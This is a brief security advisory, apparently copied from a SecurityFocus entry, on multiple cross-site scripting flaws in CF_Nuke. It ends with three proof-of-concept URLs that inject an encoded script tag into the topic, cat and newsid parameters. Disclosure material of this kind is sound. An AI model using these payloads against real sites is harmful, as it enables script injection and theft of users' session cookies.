16 lines
No EOL
778 B
Text
16 lines
No EOL
778 B
Text
source: https://www.securityfocus.com/bid/15778/info
|
|
|
|
CF_Nuke is prone to multiple cross-site scripting vulnerabilities. These are due to a lack of proper sanitization of user-supplied input.
|
|
|
|
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.
|
|
|
|
These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
|
|
|
|
http://www.example.com/index.cfm?sector=news&page=topic&topic=
|
|
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
|
|
|
|
http://www.example.com/index.cfm?sector=links&page=links&cmd=view&cat=
|
|
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
|
|
|
|
http://www.example.com/index.cfm?sector=news&page=read&newsid=
|
|
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E |